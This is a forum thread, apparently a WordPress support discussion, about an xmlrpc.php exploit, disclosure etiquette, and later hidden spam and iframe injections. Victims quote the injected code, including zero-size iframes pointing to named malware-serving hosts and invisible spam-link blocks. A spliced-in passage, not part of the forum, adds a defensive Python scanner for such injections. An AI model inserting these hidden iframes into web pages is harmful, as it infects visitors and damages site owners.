It seems what I did up there wasn't the right thing to do. Cat's out of the bag now, but next time I'll go through the right process. Really sorry for the inconvenience.
Here's a quick fix:
[bad fix removed]
I agree, sorta. Here is where I don't.
These attacks have been going on for weeks, if not months. HAD you waited, how many more WordPress blogs would have been exploited while they "got on top of it"?
Now there's a fix. Now, when someone says "hey, this happened", we, you and I, and everyone else that reads the forums knows what to say happened and can explain how to fix it.
Frankly, they, and I mean no disrespect to any developers of WP, have had ample time to "get on top" of something that has been going on for months.
You, in my opinion, did the right thing, by shining a light on a big ass black hole that bothered a lot of us now for quite some time. Excellent catch.
--
Did it go unnoticed that this thread started THREE months ago?
Well, I'm not completely convinced this is the only one. The person who hacked my page managed to do so in such a way that it stayed published.
But thanks for the support.
I saw your comment. :) Yeah, we tested it, on the SVN as well - both resulted in edited posts that were changed to drafts.
I was actually wondering how many threads I could dig up on here where people complained about logging in and finding that their previously published posts had somehow reverted to draft status, and how far back that went.
A cursory look at xmlrpc.php indicates that in 2.0.x there WAS and IS user checking. In 2.1.x it *appears* to have changed to the way it currently sits, unless there was user checking elsewhere.
Well, if they do it again, I'm logging up the wazoo right now. Hopefully I'll figure it out. :)
I'm actually thinking that there are two different exploits, but I haven't found the other. I think that this is the exploit they used to actually change the content of the post, and I think there is another that they used to set it to "publish".
That's why I think there were two separate xmlrpc calls.
This whole codebase could use a serious audit.
whoami, your fix does not. I would rather not have people think they're safe and really not be, and there is a release coming shortly anyway. If you'd like to post more to this thread please reply to the email I sent you this morning.
If anyone is scared and wants a fix NOW, they should either turn off registration (which is off by default) or delete xmlrpc.php.
Matt, thanks for your attention to this, and again I'm sorry if I caused more trouble than necessary. I'm not sure I would do it too differently if done all over again, but I think I would give you guys a couple of days to get a patch out.
Otto42 was correct a month ago that any information should be sent to our security address, that way a real fix can be put out before you inform every bad guy on the planet about the problem, even if one already has it. This is what security professionals do, too, because they know it causes far greater harm than not to.
Perhaps. But I would respond that in addition to my other reasonings, it was 4:30 AM, I was kind of gobsmacked that I even found the d*mn thing in the first place (I'm a very experienced coder/system administrator, etc., but I've never ever found a bug of this scale before), and I had no idea the "security" address even existed. I kinda lost my head.
I think it's a learning experience for both sides, and we'll leave it at that. After all, while I may have handled this in a suboptimal manner, it did take four months for it to be found - and then by someone who had nothing to do with coding wordpress and had honestly never really looked at the code before. So let's just chalk it up to experience. I apologize for the trouble. Deal?
The security address was mentioned a few posts before yours, but okay.
Matt, I didn't see it. If I had, I would have known what to do. That's my bad, especially if it were staring right at me like that, but what's done is done.
Wait a minute ... if we're talking about security then we're talking about something like strict logic. (Someone mentioned "audit"? I'm available ... I won't tell you what I wrote for optimizing VB5 shiet. As for normalizing a commodity trading shop's QuattroPro and Paradox? $250/day 14 years ago. And I did MIL-SPEC FMECA at fed rates. You wanna wade into that swamp, get yourself a good boat. Or skis.)
I don't see anything here like fault-isolation and identification. /Not saying it's not; saying don't see./
Here's the noisy bit I found in VillageIdiots' thread:
"they managed to edit mine in place and leave it published."
Well ok: if that's so, then we've got A.
But if it's "the posts end up being changed to drafts" (That'd be nice!) then we've got B.
So: if the reporter could re-iterate again, for once more time, redundantly, that's verified as a UserCase.
When someone maps out how to disconfirm that, they should publish IEEE.
Point is: it's distinct scenarios; either they're left in / toggled to Draft (1 chain) or they remain Publish (1 chain ... a different one).
The facts merely collapse the probability wave and provide a link back to the failure node, they don't fix the fault.
*I'm not much into coaxing a worm to squirm or a cat to stray ... call me old-fashioned.*
--bentrem
There were two separate xmlrpc calls. I suspect we have B that turns into A. Just because it was set to published doesn't mean this is an invalid scenario, it just means there is a component to it that has not yet been identified.
(someone DID register to my site before this happened)
Your style is very poetic and very difficult to understand.
@duskglow Yes, you're right, it's true. But not always. ;-)
1) consensus seems to be "left in Draft"; you wrote "managed to do so in such a way that it stayed published" ... have there been other reports of "left as Published"? Did the test scenario you blogged leave things as Published?
2) do you think it's two separate scenarios?
In TRAC the call seems to be for more hard data.
@duskglow: excellent work isolating the problem and identifying an instant workaround/fix.
Glad to see that the problem was found and the wordpress folks have released a patch.
I'm sure a couple people here are happy to find out that they really weren't crazy after all. :)
Thanks
So, if we upgraded to 2.3.2, this is no longer an issue?
Version 2.3.3 and I'm still getting spam injection.
<font style="position: absolute;overflow: hidden;height: 0;width: 0">
absorption disposition and elimination of alcohol 1 g zithromax activities for alcohol and drug classes
etc..etc..etc..
</font>
This was mentioned in this thread previously but it seems to have been overlooked. This seems very similar to the iframe injection. It shows up in a post after it's been published, no modify or edit noticed.
I'm getting code injected into posts on one of my blogs as well, and I just upgraded to 2.3.3 to try and prevent this and it happened again.
Same as Fluxinul:
<font style="position: absolute;overflow: hidden;height: 0;width: 0"><!--4848--><a href="
100s of spam links
</font>
How do I lock this down?
I found at least part of our problem, it appears that the wordpress db user didn't have alter privileges on the db. So the db upgrade to 2.3.2 and then 2.3.3 from a very old version, didn't work completely. It didn't fail completely either which is something that should be fixed.
We have done a force db upgrade and things are acting fairly normal now, we'll see how the spam injection goes.
I wrote more about how to fix this all:
http://www.bontb.com/2008/03/wp-content1-trojan-virus-for-wordpress-bloggers/
I have 2.3.3 and the problem is I started seeing logs from SQL since March 11th!
Now my suggestion also is to remove all users from wp-register if you don't need them...
Having the same sort of problem. I have this, which seems to be implanted in all files... bummer.
<IFRAME src="http://www.dms-clan.de/vwar/upload/index.html"
width="0" height="0" frameborder="0"></iframe>
<IFRAME src="http://www.dms-clan.de/vwar/upload/index.html"
width="0" height="0" frameborder="0"></iframe>
Plus Google has sent this message to me:
We recently discovered that some of your pages can cause users to be infected with malicious software. We have begun showing a warning page to users who visit these pages by clicking a search result on Google.com.
Any ideas, anyone, on where this is coming from? I haven't got a blog, only a guestbook.
Got this one on one of two of my ver 2.3.3 blogs: the wp-settings.php file was infected with an iframe injection to some stat.php page. I deleted the code on both sites and upgraded one to 2.5. Now this weekend I find the other blog infected again with the code below.
#iframe src='http://mystabcounter.info/index2.php' width='6' height='6' style='visibility: hidden;'></iframe#
(I have replaced the brackets with #)
Googling this site suggests it launches drive by malware type trojans.
This time though it was in every WP file in the root of the blog. I downloaded everything, including plugins and themes, and scanned with a search/replace program to search only for the offending code, and only found it in the root files. I have now deleted all WordPress files and upgraded to ver 2.5 on that one. I have other blogs on ver 2.3.3 on the same server that seem OK, but I will gradually change them over to 2.5 as well.
I notified my host, who are looking into it, but can't be sure if it was just WordPress as I have basic plugins and not much else that I have used for years; the only change was first 2.3.3 over Xmas on all blogs.
I noticed it by checking my feed links on the blog: the injection breaks the feed and displays the iframe code on the screen (if you use Firefox to view), so I would advise everyone to click around their blog, and especially the feed, to see if anything looks wrong. Also just download your entire website and scan the files with a search/replace program set to search only for iframe code; I used Handytools searchreplace as it's nice and simple and easy to just point it at a folder and let it run, searching subfolders as well.
Regards
Rob
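Rob's advice above (download the whole site and search every file for iframe code) and the hidden font blocks quoted earlier in the thread, as an added example that is not from this thread or from WordPress: a Python scanner that walks a downloaded copy of a site and flags zero-size or invisibly styled iframes and font/div/span blocks styled off-screen. The file suffixes, the 10px threshold and the example.invalid hosts are my assumptions; hits are for manual review, not automatic deletion.

```python
import re
from pathlib import Path

# Heuristics built from the injections quoted in this thread: a frame that is
# zero/tiny sized or styled invisible, and a block styled off-screen/hidden.
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
HIDDEN_STYLE_RE = re.compile(
    r"style\s*=\s*['\"]?[^'\">]*(?:visibility\s*:\s*hidden|display\s*:\s*none"
    r"|height\s*:\s*0|width\s*:\s*0)", re.IGNORECASE)
TINY_DIM_RE = re.compile(r"\b(?:width|height)\s*=\s*['\"]?\s*(\d+)", re.IGNORECASE)
HIDDEN_BLOCK_RE = re.compile(
    r"<(?:font|div|span)\b[^>]*style\s*=\s*['\"][^'\"]*"
    r"(?:position\s*:\s*absolute|overflow\s*:\s*hidden)[^'\"]*['\"][^>]*>",
    re.IGNORECASE)
TINY_PX = 10  # assumption: a frame a visitor is meant to see is bigger than 10px

def is_suspicious_iframe(tag):
    """Invisible frames have no business in a post or in core PHP files."""
    if HIDDEN_STYLE_RE.search(tag):
        return True
    dims = [int(d) for d in TINY_DIM_RE.findall(tag)]
    return bool(dims) and max(dims) <= TINY_PX

def scan_text(text):
    """Return (kind, tag) pairs for every suspicious tag; review hits by hand."""
    hits = [("hidden_iframe", m.group(0)) for m in IFRAME_RE.finditer(text)
            if is_suspicious_iframe(m.group(0))]
    hits += [("hidden_block", m.group(0)) for m in HIDDEN_BLOCK_RE.finditer(text)
             if HIDDEN_STYLE_RE.search(m.group(0))]
    return hits

def scan_tree(root, suffixes=(".php", ".html", ".htm", ".js", ".txt")):
    """Walk a downloaded site copy; map path -> findings (suffix list is assumed)."""
    results = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            hits = scan_text(path.read_text(errors="replace"))
            if hits:
                results[str(path)] = hits
    return results

# Constructed sample mirroring the shapes quoted in the thread (example.invalid
# stands in for the real hosts); the first frame is a normal embed, not flagged.
SAMPLE = """<p>Normal post text.</p>
<iframe src="http://example.invalid/video" width="425" height="344"></iframe>
<IFRAME src="http://example.invalid/vwar/upload/index.html" width="0" height="0" frameborder="0"></iframe>
<!-- Traffic Statistics --> <iframe src=http://example.invalid/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe>
<iframe src='http://example.invalid/index2.php' width='6' height='6' style='visibility: hidden;'></iframe>
<font style="position: absolute;overflow: hidden;height: 0;width: 0"><a href="http://example.invalid/x">spam</a></font>
"""
FINDINGS = scan_text(SAMPLE)  # 4 hits: three hidden frames and one hidden font block
```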
I have WP 2.5 and no "strange" plugins and got the same injection today... it looks like this: <!-- Traffic Statistics --> <iframe src=http://xx.xxx.8.157/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics --> and of course it downloads a trojan... my AV told me... still no fix for this?
I read that the best solution is to temporarily remove xmlrpc.php from the host - I did this.
Will there be a fix to the problem or it will go into the version 2.6 or whatever you call it?
If the problem exists, no one has been able to replicate it or provide logs or other evidence that might give a hint as to the cause.
DraxOfAvalon: did you catch your blog being exploited in your logs? Was your blog a fresh 2.5 install or an upgrade to 2.5 from a previous version?
Alright, here is some more information from my end in hopes that it can help things.
I had an issue in the past with the iframe injection into a couple of my blogs (back then I had only about 8). I removed the code and upgraded to the newest version of WordPress. Unfortunately I only documented the code and not the actual sites that it was found on. This was probably 4-6 months ago and since then I had not had any issues until last week.
Most of my blogs hold position within google for terms that get me sales on a daily basis. At the beginning of last week I noticed a drop in sales, and upon searching on google noticed a link underneath my blog saying "This site may harm your computer". Upon looking further into it I realized that someone had once again injected code into my posts.
I removed it, upgraded to 2.5, asked google to reanalyze my site, and about 5 days later the link was removed and I was back to business (or so I thought). During this time frame, I upgraded my 170+ wordpress blogs to 2.5 (a MAJOR pain in the butt), and scanned posts on the others to make sure the code had not been injected. After the countless amount of hours spent, I assumed I had solved the issue. Well the past two days I noticed a decrease in my main money making blog, and upon checking google I saw the damn "This site may harm your computer" link again, this time on a new site which had never had it before.
I am positive the code was not there last week when I upgraded to 2.5, and was injected since. Searching around on google I cannot seem to find much information on how to resolve the issue, which is how I happened upon this page. When potential customers click my site, it takes them to a google page warning them, so I essentially lose ALL of my sales during the down time. I am pissed to say the least.
When I went through the sites checking posts and upgrading to 2.5 I notated the ones which had been injected, and going through them the only plugin that they share would be "Google XML Sitemaps by Arne Brachhold". Could this be the issue? That I have the sitemap files set to CHMOD 666?
So, the blogs which were injected, were upgraded to 2.5 from a previous version of wordpress. I will have to start the time consuming process of manually checking the posts on all 170+ blogs again to see if any others are compromised.
This is costing me a ridiculous amount of money, I would appreciate any input on how I can secure these blogs and resolve the issue, which is why I provided so much. I will check back often so if you have any questions regarding my situation I will happily answer them.
It should also be noted that I do allow both user registrations and comments on these blogs, but require moderation for comments. Had not seen anything fishy when approving comments. Should I turn off user registrations?